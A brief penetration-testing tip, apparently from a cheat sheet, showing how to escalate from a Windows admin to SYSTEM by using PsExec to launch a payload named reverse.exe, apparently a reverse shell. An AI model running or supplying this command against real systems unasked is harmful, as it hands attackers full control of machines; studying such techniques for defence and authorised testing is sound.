To escalate from an admin user to full `SYSTEM` privileges, you can use the PsExec tool from Windows Sysinternals https://learn.microsoft.com/en-us/sysinternals/downloads/psexec ```powershell .\PsExec64.exe -accepteula -i -s C:\Temp\reverse.exe ```